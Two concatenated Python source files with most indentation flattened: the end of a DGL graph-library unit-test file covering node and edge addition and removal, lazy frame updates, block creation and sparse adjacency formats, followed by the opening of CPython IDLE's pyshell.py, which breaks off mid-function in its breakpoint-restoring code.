assert F.array_equal(g.nodes['developer'].data['h'], F.tensor([3, 3, 0], dtype=idtype))
assert F.array_equal(g.nodes['game'].data['h'], F.tensor([2, 2, 1, 1], dtype=idtype))
assert F.array_equal(g.edges['develops'].data['h'], F.tensor([0, 0, 2, 2], dtype=idtype))
@parametrize_dtype
def test_add_nodes(idtype):
# homogeneous Graphs
g = dgl.graph(([0, 1], [1, 2]), idtype=idtype, device=F.ctx())
g.ndata['h'] = F.copy_to(F.tensor([1,1,1], dtype=idtype), ctx=F.ctx())
g.add_nodes(1)
assert g.number_of_nodes() == 4
assert F.array_equal(g.ndata['h'], F.tensor([1, 1, 1, 0], dtype=idtype))
    # graph with no edges
g = dgl.graph(([], []), num_nodes=3, idtype=idtype, device=F.ctx())
g.ndata['h'] = F.copy_to(F.tensor([1,1,1], dtype=idtype), ctx=F.ctx())
g.add_nodes(1, data={'h' : F.copy_to(F.tensor([2], dtype=idtype), ctx=F.ctx())})
assert g.number_of_nodes() == 4
assert F.array_equal(g.ndata['h'], F.tensor([1, 1, 1, 2], dtype=idtype))
# bipartite graph
g = dgl.heterograph({('user', 'plays', 'game'): ([0, 1], [1, 2])},
idtype=idtype, device=F.ctx())
g.add_nodes(2, data={'h' : F.copy_to(F.tensor([2, 2], dtype=idtype), ctx=F.ctx())}, ntype='user')
assert g.number_of_nodes('user') == 4
assert F.array_equal(g.nodes['user'].data['h'], F.tensor([0, 0, 2, 2], dtype=idtype))
g.add_nodes(2, ntype='game')
assert g.number_of_nodes('game') == 5
# heterogeneous graph
g = create_test_heterograph3(idtype)
g.add_nodes(1, ntype='user')
g.add_nodes(2, data={'h' : F.copy_to(F.tensor([2, 2], dtype=idtype), ctx=F.ctx())}, ntype='game')
g.add_nodes(0, ntype='developer')
assert g.number_of_nodes('user') == 4
assert g.number_of_nodes('game') == 4
assert g.number_of_nodes('developer') == 2
assert F.array_equal(g.nodes['user'].data['h'], F.tensor([1, 1, 1, 0], dtype=idtype))
assert F.array_equal(g.nodes['game'].data['h'], F.tensor([2, 2, 2, 2], dtype=idtype))
@unittest.skipIf(dgl.backend.backend_name == "mxnet", reason="MXNet has error with (0,) shape tensor.")
@parametrize_dtype
def test_remove_edges(idtype):
# homogeneous Graphs
g = dgl.graph(([0, 1], [1, 2]), idtype=idtype, device=F.ctx())
e = 0
g.remove_edges(e)
assert g.number_of_edges() == 1
u, v = g.edges(form='uv', order='eid')
assert F.array_equal(u, F.tensor([1], dtype=idtype))
assert F.array_equal(v, F.tensor([2], dtype=idtype))
g = dgl.graph(([0, 1], [1, 2]), idtype=idtype, device=F.ctx())
e = [0]
g.remove_edges(e)
assert g.number_of_edges() == 1
u, v = g.edges(form='uv', order='eid')
assert F.array_equal(u, F.tensor([1], dtype=idtype))
assert F.array_equal(v, F.tensor([2], dtype=idtype))
e = F.tensor([0], dtype=idtype)
g.remove_edges(e)
assert g.number_of_edges() == 0
# has node data
g = dgl.graph(([0, 1], [1, 2]), idtype=idtype, device=F.ctx())
g.ndata['h'] = F.copy_to(F.tensor([1, 2, 3], dtype=idtype), ctx=F.ctx())
g.remove_edges(1)
assert g.number_of_edges() == 1
assert F.array_equal(g.ndata['h'], F.tensor([1, 2, 3], dtype=idtype))
# has edge data
g = dgl.graph(([0, 1], [1, 2]), idtype=idtype, device=F.ctx())
g.edata['h'] = F.copy_to(F.tensor([1, 2], dtype=idtype), ctx=F.ctx())
g.remove_edges(0)
assert g.number_of_edges() == 1
assert F.array_equal(g.edata['h'], F.tensor([2], dtype=idtype))
# invalid eid
assert_fail = False
try:
g.remove_edges(1)
except:
assert_fail = True
assert assert_fail
# bipartite graph
g = dgl.heterograph({
('user', 'plays', 'game'): ([0, 1], [1, 2])
}, idtype=idtype, device=F.ctx())
e = 0
g.remove_edges(e)
assert g.number_of_edges() == 1
u, v = g.edges(form='uv', order='eid')
assert F.array_equal(u, F.tensor([1], dtype=idtype))
assert F.array_equal(v, F.tensor([2], dtype=idtype))
g = dgl.heterograph(
{('user', 'plays', 'game'): ([0, 1], [1, 2])}, idtype=idtype, device=F.ctx())
e = [0]
g.remove_edges(e)
assert g.number_of_edges() == 1
u, v = g.edges(form='uv', order='eid')
assert F.array_equal(u, F.tensor([1], dtype=idtype))
assert F.array_equal(v, F.tensor([2], dtype=idtype))
e = F.tensor([0], dtype=idtype)
g.remove_edges(e)
assert g.number_of_edges() == 0
# has data
g = dgl.heterograph(
{('user', 'plays', 'game'): ([0, 1], [1, 2])}, idtype=idtype, device=F.ctx())
g.nodes['user'].data['h'] = F.copy_to(F.tensor([1, 1], dtype=idtype), ctx=F.ctx())
g.nodes['game'].data['h'] = F.copy_to(F.tensor([2, 2, 2], dtype=idtype), ctx=F.ctx())
g.edata['h'] = F.copy_to(F.tensor([1, 2], dtype=idtype), ctx=F.ctx())
g.remove_edges(1)
assert g.number_of_edges() == 1
assert F.array_equal(g.nodes['user'].data['h'], F.tensor([1, 1], dtype=idtype))
assert F.array_equal(g.nodes['game'].data['h'], F.tensor([2, 2, 2], dtype=idtype))
assert F.array_equal(g.edata['h'], F.tensor([1], dtype=idtype))
# heterogeneous graph
g = create_test_heterograph3(idtype)
g.edges['plays'].data['h'] = F.copy_to(F.tensor([1, 2, 3, 4], dtype=idtype), ctx=F.ctx())
g.remove_edges(1, etype='plays')
assert g.number_of_edges('plays') == 3
u, v = g.edges(form='uv', order='eid', etype='plays')
assert F.array_equal(u, F.tensor([0, 1, 2], dtype=idtype))
assert F.array_equal(v, F.tensor([0, 1, 1], dtype=idtype))
assert F.array_equal(g.edges['plays'].data['h'], F.tensor([1, 3, 4], dtype=idtype))
# remove all edges of 'develops'
g.remove_edges([0, 1], etype='develops')
assert g.number_of_edges('develops') == 0
assert F.array_equal(g.nodes['user'].data['h'], F.tensor([1, 1, 1], dtype=idtype))
assert F.array_equal(g.nodes['game'].data['h'], F.tensor([2, 2], dtype=idtype))
assert F.array_equal(g.nodes['developer'].data['h'], F.tensor([3, 3], dtype=idtype))
@parametrize_dtype
def test_remove_nodes(idtype):
# homogeneous Graphs
g = dgl.graph(([0, 1], [1, 2]), idtype=idtype, device=F.ctx())
n = 0
g.remove_nodes(n)
assert g.number_of_nodes() == 2
assert g.number_of_edges() == 1
u, v = g.edges(form='uv', order='eid')
assert F.array_equal(u, F.tensor([0], dtype=idtype))
assert F.array_equal(v, F.tensor([1], dtype=idtype))
g = dgl.graph(([0, 1], [1, 2]), idtype=idtype, device=F.ctx())
n = [1]
g.remove_nodes(n)
assert g.number_of_nodes() == 2
assert g.number_of_edges() == 0
g = dgl.graph(([0, 1], [1, 2]), idtype=idtype, device=F.ctx())
n = F.tensor([2], dtype=idtype)
g.remove_nodes(n)
assert g.number_of_nodes() == 2
assert g.number_of_edges() == 1
u, v = g.edges(form='uv', order='eid')
assert F.array_equal(u, F.tensor([0], dtype=idtype))
assert F.array_equal(v, F.tensor([1], dtype=idtype))
# invalid nid
assert_fail = False
try:
g.remove_nodes(3)
except:
assert_fail = True
assert assert_fail
# has node and edge data
g = dgl.graph(([0, 0, 2], [0, 1, 2]), idtype=idtype, device=F.ctx())
g.ndata['hv'] = F.copy_to(F.tensor([1, 2, 3], dtype=idtype), ctx=F.ctx())
g.edata['he'] = F.copy_to(F.tensor([1, 2, 3], dtype=idtype), ctx=F.ctx())
g.remove_nodes(F.tensor([0], dtype=idtype))
assert g.number_of_nodes() == 2
assert g.number_of_edges() == 1
u, v = g.edges(form='uv', order='eid')
assert F.array_equal(u, F.tensor([1], dtype=idtype))
assert F.array_equal(v, F.tensor([1], dtype=idtype))
assert F.array_equal(g.ndata['hv'], F.tensor([2, 3], dtype=idtype))
assert F.array_equal(g.edata['he'], F.tensor([3], dtype=idtype))
    # bipartite graph
g = dgl.heterograph(
{('user', 'plays', 'game'): ([0, 1], [1, 2])}, idtype=idtype, device=F.ctx())
n = 0
g.remove_nodes(n, ntype='user')
assert g.number_of_nodes('user') == 1
assert g.number_of_nodes('game') == 3
assert g.number_of_edges() == 1
u, v = g.edges(form='uv', order='eid')
assert F.array_equal(u, F.tensor([0], dtype=idtype))
assert F.array_equal(v, F.tensor([2], dtype=idtype))
g = dgl.heterograph(
{('user', 'plays', 'game'): ([0, 1], [1, 2])}, idtype=idtype, device=F.ctx())
n = [1]
g.remove_nodes(n, ntype='user')
assert g.number_of_nodes('user') == 1
assert g.number_of_nodes('game') == 3
assert g.number_of_edges() == 1
u, v = g.edges(form='uv', order='eid')
assert F.array_equal(u, F.tensor([0], dtype=idtype))
assert F.array_equal(v, F.tensor([1], dtype=idtype))
g = dgl.heterograph(
{('user', 'plays', 'game'): ([0, 1], [1, 2])}, idtype=idtype, device=F.ctx())
n = F.tensor([0], dtype=idtype)
g.remove_nodes(n, ntype='game')
assert g.number_of_nodes('user') == 2
assert g.number_of_nodes('game') == 2
assert g.number_of_edges() == 2
u, v = g.edges(form='uv', order='eid')
assert F.array_equal(u, F.tensor([0, 1], dtype=idtype))
assert F.array_equal(v, F.tensor([0 ,1], dtype=idtype))
# heterogeneous graph
g = create_test_heterograph3(idtype)
g.edges['plays'].data['h'] = F.copy_to(F.tensor([1, 2, 3, 4], dtype=idtype), ctx=F.ctx())
g.remove_nodes(0, ntype='game')
assert g.number_of_nodes('user') == 3
assert g.number_of_nodes('game') == 1
assert g.number_of_nodes('developer') == 2
assert g.number_of_edges('plays') == 2
assert g.number_of_edges('develops') == 1
assert F.array_equal(g.nodes['user'].data['h'], F.tensor([1, 1, 1], dtype=idtype))
assert F.array_equal(g.nodes['game'].data['h'], F.tensor([2], dtype=idtype))
assert F.array_equal(g.nodes['developer'].data['h'], F.tensor([3, 3], dtype=idtype))
u, v = g.edges(form='uv', order='eid', etype='plays')
assert F.array_equal(u, F.tensor([1, 2], dtype=idtype))
assert F.array_equal(v, F.tensor([0, 0], dtype=idtype))
assert F.array_equal(g.edges['plays'].data['h'], F.tensor([3, 4], dtype=idtype))
u, v = g.edges(form='uv', order='eid', etype='develops')
assert F.array_equal(u, F.tensor([1], dtype=idtype))
assert F.array_equal(v, F.tensor([0], dtype=idtype))
@parametrize_dtype
def test_frame(idtype):
g = dgl.graph(([0, 1, 2], [1, 2, 3]), idtype=idtype, device=F.ctx())
g.ndata['h'] = F.copy_to(F.tensor([0, 1, 2, 3], dtype=idtype), ctx=F.ctx())
g.edata['h'] = F.copy_to(F.tensor([0, 1, 2], dtype=idtype), ctx=F.ctx())
# remove nodes
sg = dgl.remove_nodes(g, [3])
# check for lazy update
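    # before any read, the subgraph's columns still hold the parent's full storage;
    # reading ndata/edata materializes the sliced tensors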
assert F.array_equal(sg._node_frames[0]._columns['h'].storage, g.ndata['h'])
assert F.array_equal(sg._edge_frames[0]._columns['h'].storage, g.edata['h'])
assert sg.ndata['h'].shape[0] == 3
assert sg.edata['h'].shape[0] == 2
# update after read
assert F.array_equal(sg._node_frames[0]._columns['h'].storage, F.tensor([0, 1, 2], dtype=idtype))
assert F.array_equal(sg._edge_frames[0]._columns['h'].storage, F.tensor([0, 1], dtype=idtype))
ng = dgl.add_nodes(sg, 1)
assert ng.ndata['h'].shape[0] == 4
assert F.array_equal(ng._node_frames[0]._columns['h'].storage, F.tensor([0, 1, 2, 0], dtype=idtype))
ng = dgl.add_edges(ng, [3], [1])
assert ng.edata['h'].shape[0] == 3
assert F.array_equal(ng._edge_frames[0]._columns['h'].storage, F.tensor([0, 1, 0], dtype=idtype))
# multi level lazy update
sg = dgl.remove_nodes(g, [3])
assert F.array_equal(sg._node_frames[0]._columns['h'].storage, g.ndata['h'])
assert F.array_equal(sg._edge_frames[0]._columns['h'].storage, g.edata['h'])
ssg = dgl.remove_nodes(sg, [1])
assert F.array_equal(ssg._node_frames[0]._columns['h'].storage, g.ndata['h'])
assert F.array_equal(ssg._edge_frames[0]._columns['h'].storage, g.edata['h'])
# ssg is changed
assert ssg.ndata['h'].shape[0] == 2
assert ssg.edata['h'].shape[0] == 0
assert F.array_equal(ssg._node_frames[0]._columns['h'].storage, F.tensor([0, 2], dtype=idtype))
# sg still in lazy model
assert F.array_equal(sg._node_frames[0]._columns['h'].storage, g.ndata['h'])
assert F.array_equal(sg._edge_frames[0]._columns['h'].storage, g.edata['h'])
@unittest.skipIf(dgl.backend.backend_name == "tensorflow", reason="TensorFlow always create a new tensor")
@unittest.skipIf(F._default_context_str == 'cpu', reason="cpu do not have context change problem")
@parametrize_dtype
def test_frame_device(idtype):
g = dgl.graph(([0,1,2], [2,3,1]))
g.ndata['h'] = F.copy_to(F.tensor([1,1,1,2], dtype=idtype), ctx=F.cpu())
g.ndata['hh'] = F.copy_to(F.ones((4,3), dtype=idtype), ctx=F.cpu())
g.edata['h'] = F.copy_to(F.tensor([1,2,3], dtype=idtype), ctx=F.cpu())
g = g.to(F.ctx())
# lazy device copy
assert F.context(g._node_frames[0]._columns['h'].storage) == F.cpu()
assert F.context(g._node_frames[0]._columns['hh'].storage) == F.cpu()
print(g.ndata['h'])
assert F.context(g._node_frames[0]._columns['h'].storage) == F.ctx()
assert F.context(g._node_frames[0]._columns['hh'].storage) == F.cpu()
assert F.context(g._edge_frames[0]._columns['h'].storage) == F.cpu()
# lazy device copy in subgraph
sg = dgl.node_subgraph(g, [0,1,2])
assert F.context(sg._node_frames[0]._columns['h'].storage) == F.ctx()
assert F.context(sg._node_frames[0]._columns['hh'].storage) == F.cpu()
assert F.context(sg._edge_frames[0]._columns['h'].storage) == F.cpu()
print(sg.ndata['hh'])
assert F.context(sg._node_frames[0]._columns['hh'].storage) == F.ctx()
assert F.context(sg._edge_frames[0]._columns['h'].storage) == F.cpu()
# back to cpu
sg = sg.to(F.cpu())
assert F.context(sg._node_frames[0]._columns['h'].storage) == F.ctx()
assert F.context(sg._node_frames[0]._columns['hh'].storage) == F.ctx()
assert F.context(sg._edge_frames[0]._columns['h'].storage) == F.cpu()
print(sg.ndata['h'])
print(sg.ndata['hh'])
print(sg.edata['h'])
assert F.context(sg._node_frames[0]._columns['h'].storage) == F.cpu()
assert F.context(sg._node_frames[0]._columns['hh'].storage) == F.cpu()
assert F.context(sg._edge_frames[0]._columns['h'].storage) == F.cpu()
# set some field
sg = sg.to(F.ctx())
assert F.context(sg._node_frames[0]._columns['h'].storage) == F.cpu()
sg.ndata['h'][0] = 5
assert F.context(sg._node_frames[0]._columns['h'].storage) == F.ctx()
assert F.context(sg._node_frames[0]._columns['hh'].storage) == F.cpu()
assert F.context(sg._edge_frames[0]._columns['h'].storage) == F.cpu()
# add nodes
ng = dgl.add_nodes(sg, 3)
assert F.context(ng._node_frames[0]._columns['h'].storage) == F.ctx()
assert F.context(ng._node_frames[0]._columns['hh'].storage) == F.ctx()
assert F.context(ng._edge_frames[0]._columns['h'].storage) == F.cpu()
@parametrize_dtype
def test_create_block(idtype):
block = dgl.create_block(([0, 1, 2], [1, 2, 3]), idtype=idtype, device=F.ctx())
assert block.num_src_nodes() == 3
assert block.num_dst_nodes() == 4
assert block.num_edges() == 3
block = dgl.create_block(([], []), idtype=idtype, device=F.ctx())
assert block.num_src_nodes() == 0
assert block.num_dst_nodes() == 0
assert block.num_edges() == 0
block = dgl.create_block(([], []), 3, 4, idtype=idtype, device=F.ctx())
assert block.num_src_nodes() == 3
assert block.num_dst_nodes() == 4
assert block.num_edges() == 0
block = dgl.create_block(([0, 1, 2], [1, 2, 3]), 4, 5, idtype=idtype, device=F.ctx())
assert block.num_src_nodes() == 4
assert block.num_dst_nodes() == 5
assert block.num_edges() == 3
sx = F.randn((4, 5))
dx = F.randn((5, 6))
ex = F.randn((3, 4))
block.srcdata['x'] = sx
block.dstdata['x'] = dx
block.edata['x'] = ex
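    # block_to_graph should expose the same feature tensors without copying
    # (verified with 'is' below)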
g = dgl.block_to_graph(block)
assert g.num_src_nodes() == 4
assert g.num_dst_nodes() == 5
assert g.num_edges() == 3
assert g.srcdata['x'] is sx
assert g.dstdata['x'] is dx
assert g.edata['x'] is ex
block = dgl.create_block({
('A', 'AB', 'B'): ([1, 2, 3], [2, 1, 0]),
('B', 'BA', 'A'): ([2, 3], [3, 4])},
idtype=idtype, device=F.ctx())
assert block.num_src_nodes('A') == 4
assert block.num_src_nodes('B') == 4
assert block.num_dst_nodes('B') == 3
assert block.num_dst_nodes('A') == 5
assert block.num_edges('AB') == 3
assert block.num_edges('BA') == 2
block = dgl.create_block({
('A', 'AB', 'B'): ([], []),
('B', 'BA', 'A'): ([], [])},
idtype=idtype, device=F.ctx())
assert block.num_src_nodes('A') == 0
assert block.num_src_nodes('B') == 0
assert block.num_dst_nodes('B') == 0
assert block.num_dst_nodes('A') == 0
assert block.num_edges('AB') == 0
assert block.num_edges('BA') == 0
block = dgl.create_block({
('A', 'AB', 'B'): ([], []),
('B', 'BA', 'A'): ([], [])},
num_src_nodes={'A': 5, 'B': 5},
num_dst_nodes={'A': 6, 'B': 4},
idtype=idtype, device=F.ctx())
assert block.num_src_nodes('A') == 5
assert block.num_src_nodes('B') == 5
assert block.num_dst_nodes('B') == 4
assert block.num_dst_nodes('A') == 6
assert block.num_edges('AB') == 0
assert block.num_edges('BA') == 0
block = dgl.create_block({
('A', 'AB', 'B'): ([1, 2, 3], [2, 1, 0]),
('B', 'BA', 'A'): ([2, 3], [3, 4])},
num_src_nodes={'A': 5, 'B': 5},
num_dst_nodes={'A': 6, 'B': 4},
idtype=idtype, device=F.ctx())
assert block.num_src_nodes('A') == 5
assert block.num_src_nodes('B') == 5
assert block.num_dst_nodes('B') == 4
assert block.num_dst_nodes('A') == 6
assert block.num_edges(('A', 'AB', 'B')) == 3
assert block.num_edges(('B', 'BA', 'A')) == 2
sax = F.randn((5, 3))
sbx = F.randn((5, 4))
dax = F.randn((6, 5))
dbx = F.randn((4, 6))
eabx = F.randn((3, 7))
ebax = F.randn((2, 8))
block.srcnodes['A'].data['x'] = sax
block.srcnodes['B'].data['x'] = sbx
block.dstnodes['A'].data['x'] = dax
block.dstnodes['B'].data['x'] = dbx
block.edges['AB'].data['x'] = eabx
block.edges['BA'].data['x'] = ebax
hg = dgl.block_to_graph(block)
assert hg.num_nodes('A_src') == 5
assert hg.num_nodes('B_src') == 5
assert hg.num_nodes('A_dst') == 6
assert hg.num_nodes('B_dst') == 4
assert hg.num_edges(('A_src', 'AB', 'B_dst')) == 3
assert hg.num_edges(('B_src', 'BA', 'A_dst')) == 2
assert hg.nodes['A_src'].data['x'] is sax
assert hg.nodes['B_src'].data['x'] is sbx
assert hg.nodes['A_dst'].data['x'] is dax
assert hg.nodes['B_dst'].data['x'] is dbx
assert hg.edges['AB'].data['x'] is eabx
assert hg.edges['BA'].data['x'] is ebax
@parametrize_dtype
@pytest.mark.parametrize('fmt', ['coo', 'csr', 'csc'])
def test_adj_sparse(idtype, fmt):
if fmt == 'coo':
A = ssp.random(10, 10, 0.2).tocoo()
A.data = np.arange(20)
row = F.tensor(A.row, idtype)
col = F.tensor(A.col, idtype)
g = dgl.graph((row, col))
elif fmt == 'csr':
A = ssp.random(10, 10, 0.2).tocsr()
A.data = np.arange(20)
indptr = F.tensor(A.indptr, idtype)
indices = F.tensor(A.indices, idtype)
g = dgl.graph(('csr', (indptr, indices, [])))
with pytest.raises(DGLError):
g2 = dgl.graph(('csr', (indptr[:-1], indices, [])), num_nodes=10)
elif fmt == 'csc':
A = ssp.random(10, 10, 0.2).tocsc()
A.data = np.arange(20)
indptr = F.tensor(A.indptr, idtype)
indices = F.tensor(A.indices, idtype)
g = dgl.graph(('csc', (indptr, indices, [])))
with pytest.raises(DGLError):
            g2 = dgl.graph(('csc', (indptr[:-1], indices, [])), num_nodes=10)
A_coo = A.tocoo()
A_csr = A.tocsr()
A_csc = A.tocsc()
row, col = g.adj_sparse('coo')
assert np.array_equal(F.asnumpy(row), A_coo.row)
assert np.array_equal(F.asnumpy(col), A_coo.col)
indptr, indices, eids = g.adj_sparse('csr')
assert np.array_equal(F.asnumpy(indptr), A_csr.indptr)
if fmt == 'csr':
assert len(eids) == 0
assert np.array_equal(F.asnumpy(indices), A_csr.indices)
else:
indices_sorted = F.zeros(len(indices), idtype)
indices_sorted = F.scatter_row(indices_sorted, eids, indices)
indices_sorted_np = np.zeros(len(indices), dtype=A_csr.indices.dtype)
indices_sorted_np[A_csr.data] = A_csr.indices
assert np.array_equal(F.asnumpy(indices_sorted), indices_sorted_np)
indptr, indices, eids = g.adj_sparse('csc')
assert np.array_equal(F.asnumpy(indptr), A_csc.indptr)
if fmt == 'csc':
assert len(eids) == 0
assert np.array_equal(F.asnumpy(indices), A_csc.indices)
else:
indices_sorted = F.zeros(len(indices), idtype)
indices_sorted = F.scatter_row(indices_sorted, eids, indices)
indices_sorted_np = np.zeros(len(indices), dtype=A_csc.indices.dtype)
indices_sorted_np[A_csc.data] = A_csc.indices
assert np.array_equal(F.asnumpy(indices_sorted), indices_sorted_np)
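# Note on test_adj_sparse above (an explanatory aside, not part of the original test): when the
# graph was not created in the queried format, adj_sparse() also returns a non-empty `eids` array
# mapping each returned position to its edge ID; scattering `indices` by `eids` (as done above)
# therefore recovers the column indices in canonical edge-ID order, which is what the comparison
# against the SciPy matrix relies on.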
def _test_forking_pickler_entry(g, q):
q.put(g.formats())
@unittest.skipIf(dgl.backend.backend_name == "mxnet", reason="MXNet doesn't support spawning")
def test_forking_pickler():
ctx = mp.get_context('spawn')
g = dgl.graph(([0,1,2],[1,2,3]))
g.create_formats_()
q = ctx.Queue(1)
proc = ctx.Process(target=_test_forking_pickler_entry, args=(g, q))
proc.start()
fmt = q.get()['created']
proc.join()
assert 'coo' in fmt
assert 'csr' in fmt
assert 'csc' in fmt
if __name__ == '__main__':
# test_create()
# test_query()
# test_hypersparse()
# test_adj("int32")
# test_inc()
# test_view("int32")
# test_view1("int32")
# test_flatten(F.int32)
# test_convert_bound()
# test_convert()
# test_to_device("int32")
# test_transform("int32")
# test_subgraph("int32")
# test_subgraph_mask("int32")
# test_apply()
# test_level1()
# test_level2()
# test_updates()
# test_backward()
# test_empty_heterograph('int32')
# test_types_in_function()
# test_stack_reduce()
# test_isolated_ntype()
# test_bipartite()
# test_dtype_cast()
# test_float_cast()
# test_reverse("int32")
# test_format()
#test_add_edges(F.int32)
#test_add_nodes(F.int32)
#test_remove_edges(F.int32)
#test_remove_nodes(F.int32)
#test_clone(F.int32)
#test_frame(F.int32)
#test_frame_device(F.int32)
#test_empty_query(F.int32)
#test_create_block(F.int32)
pass
|
pyshell.py
|
#! /usr/bin/env python3
import sys
if __name__ == "__main__":
sys.modules['idlelib.pyshell'] = sys.modules['__main__']
try:
from tkinter import *
except ImportError:
print("** IDLE can't import Tkinter.\n"
"Your Python may not be configured for Tk. **", file=sys.__stderr__)
raise SystemExit(1)
# Valid arguments for the ...Awareness call below are defined in the following.
# https://msdn.microsoft.com/en-us/library/windows/desktop/dn280512(v=vs.85).aspx
if sys.platform == 'win32':
try:
import ctypes
PROCESS_SYSTEM_DPI_AWARE = 1 # Int required.
ctypes.OleDLL('shcore').SetProcessDpiAwareness(PROCESS_SYSTEM_DPI_AWARE)
except (ImportError, AttributeError, OSError):
pass
from tkinter import messagebox
if TkVersion < 8.5:
root = Tk() # otherwise create root in main
root.withdraw()
from idlelib.run import fix_scaling
fix_scaling(root)
messagebox.showerror("Idle Cannot Start",
"Idle requires tcl/tk 8.5+, not %s." % TkVersion,
parent=root)
raise SystemExit(1)
from code import InteractiveInterpreter
import linecache
import os
import os.path
from platform import python_version
import re
import socket
import subprocess
from textwrap import TextWrapper
import threading
import time
import tokenize
import warnings
from idlelib.colorizer import ColorDelegator
from idlelib.config import idleConf
from idlelib import debugger
from idlelib import debugger_r
from idlelib.editor import EditorWindow, fixwordbreaks
from idlelib.filelist import FileList
from idlelib.outwin import OutputWindow
from idlelib import rpc
from idlelib.run import idle_formatwarning, StdInputFile, StdOutputFile
from idlelib.undo import UndoDelegator
HOST = '127.0.0.1' # python execution server on localhost loopback
PORT = 0 # someday pass in host, port for remote debug capability
# Override warnings module to write to warning_stream. Initialize to send IDLE
# internal warnings to the console. ScriptBinding.check_syntax() will
# temporarily redirect the stream to the shell window to display warnings when
# checking user's code.
warning_stream = sys.__stderr__ # None, at least on Windows, if no console.
def idle_showwarning(
message, category, filename, lineno, file=None, line=None):
"""Show Idle-format warning (after replacing warnings.showwarning).
The differences are the formatter called, the file=None replacement,
which can be None, the capture of the consequence AttributeError,
and the output of a hard-coded prompt.
"""
if file is None:
file = warning_stream
try:
file.write(idle_formatwarning(
message, category, filename, lineno, line=line))
file.write(">>> ")
except (AttributeError, OSError):
pass # if file (probably __stderr__) is invalid, skip warning.
_warnings_showwarning = None
def capture_warnings(capture):
"Replace warning.showwarning with idle_showwarning, or reverse."
global _warnings_showwarning
if capture:
if _warnings_showwarning is None:
_warnings_showwarning = warnings.showwarning
warnings.showwarning = idle_showwarning
else:
if _warnings_showwarning is not None:
warnings.showwarning = _warnings_showwarning
_warnings_showwarning = None
capture_warnings(True)
def extended_linecache_checkcache(filename=None,
orig_checkcache=linecache.checkcache):
"""Extend linecache.checkcache to preserve the <pyshell#...> entries
Rather than repeating the linecache code, patch it to save the
<pyshell#...> entries, call the original linecache.checkcache()
(skipping them), and then restore the saved entries.
orig_checkcache is bound at definition time to the original
method, allowing it to be patched.
"""
cache = linecache.cache
save = {}
for key in list(cache):
if key[:1] + key[-1:] == '<>':
save[key] = cache.pop(key)
orig_checkcache(filename)
cache.update(save)
# Patch linecache.checkcache():
linecache.checkcache = extended_linecache_checkcache
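# Illustrative effect of the patch (a sketch, not executed here): pseudo-file entries created by
# the shell, e.g. linecache.cache['<pyshell#1>'], now survive a call to linecache.checkcache(),
# while ordinary on-disk entries are still validated and purged exactly as before.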
class PyShellEditorWindow(EditorWindow):
"Regular text edit window in IDLE, supports breakpoints"
def __init__(self, *args):
self.breakpoints = []
EditorWindow.__init__(self, *args)
self.text.bind("<<set-breakpoint-here>>", self.set_breakpoint_here)
self.text.bind("<<clear-breakpoint-here>>", self.clear_breakpoint_here)
self.text.bind("<<open-python-shell>>", self.flist.open_shell)
#TODO: don't read/write this from/to .idlerc when testing
self.breakpointPath = os.path.join(
idleConf.userdir, 'breakpoints.lst')
# whenever a file is changed, restore breakpoints
def filename_changed_hook(old_hook=self.io.filename_change_hook,
self=self):
self.restore_file_breaks()
old_hook()
self.io.set_filename_change_hook(filename_changed_hook)
if self.io.filename:
self.restore_file_breaks()
self.color_breakpoint_text()
rmenu_specs = [
("Cut", "<<cut>>", "rmenu_check_cut"),
("Copy", "<<copy>>", "rmenu_check_copy"),
("Paste", "<<paste>>", "rmenu_check_paste"),
(None, None, None),
("Set Breakpoint", "<<set-breakpoint-here>>", None),
("Clear Breakpoint", "<<clear-breakpoint-here>>", None)
]
def color_breakpoint_text(self, color=True):
"Turn colorizing of breakpoint text on or off"
if self.io is None:
# possible due to update in restore_file_breaks
return
if color:
theme = idleConf.CurrentTheme()
cfg = idleConf.GetHighlight(theme, "break")
else:
cfg = {'foreground': '', 'background': ''}
self.text.tag_config('BREAK', cfg)
def set_breakpoint(self, lineno):
text = self.text
filename = self.io.filename
text.tag_add("BREAK", "%d.0" % lineno, "%d.0" % (lineno+1))
try:
self.breakpoints.index(lineno)
except ValueError: # only add if missing, i.e. do once
self.breakpoints.append(lineno)
try: # update the subprocess debugger
debug = self.flist.pyshell.interp.debugger
debug.set_breakpoint_here(filename, lineno)
except: # but debugger may not be active right now....
pass
def set_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
self.set_breakpoint(lineno)
def clear_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
try:
self.breakpoints.remove(lineno)
except:
pass
text.tag_remove("BREAK", "insert linestart",\
"insert lineend +1char")
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_breakpoint_here(filename, lineno)
except:
pass
def clear_file_breaks(self):
if self.breakpoints:
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
self.breakpoints = []
text.tag_remove("BREAK", "1.0", END)
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_file_breaks(filename)
except:
pass
def store_file_breaks(self):
"Save breakpoints when file is saved"
# XXX 13 Dec 2002 KBK Currently the file must be saved before it can
# be run. The breaks are saved at that time. If we introduce
# a temporary file save feature the save breaks functionality
# needs to be re-verified, since the breaks at the time the
# temp file is created may differ from the breaks at the last
# permanent save of the file. Currently, a break introduced
# after a save will be effective, but not persistent.
# This is necessary to keep the saved breaks synched with the
# saved file.
#
# Breakpoints are set as tagged ranges in the text.
# Since a modified file has to be saved before it is
# run, and since self.breakpoints (from which the subprocess
# debugger is loaded) is updated during the save, the visible
# breaks stay synched with the subprocess even if one of these
# unexpected breakpoint deletions occurs.
breaks = self.breakpoints
filename = self.io.filename
try:
with open(self.breakpointPath, "r") as fp:
lines = fp.readlines()
except OSError:
lines = []
try:
with open(self.breakpointPath, "w") as new_file:
for line in lines:
if not line.startswith(filename + '='):
new_file.write(line)
self.update_breakpoints()
breaks = self.breakpoints
if breaks:
new_file.write(filename + '=' + str(breaks) + '\n')
except OSError as err:
if not getattr(self.root, "breakpoint_error_displayed", False):
self.root.breakpoint_error_displayed = True
messagebox.showerror(title='IDLE Error',
message='Unable to update breakpoint list:\n%s'
% str(err),
parent=self.text)
def restore_file_breaks(self):
self.text.update() # this enables setting "BREAK" tags to be visible
if self.io is None:
# can happen if IDLE closes due to the .update() call
return
filename = self.io.filename
if filename is None:
return
if os.path.isfile(self.breakpointPath):
with open(self.breakpointPath, "r") as fp:
lines = fp.readlines()
for line in lines:
if line.startswith(filename + '='):
breakpoint_linenumbers = eval(line[len(filename)+1:])
for breakpoint_linenumber in breakpoint_linenumbers:
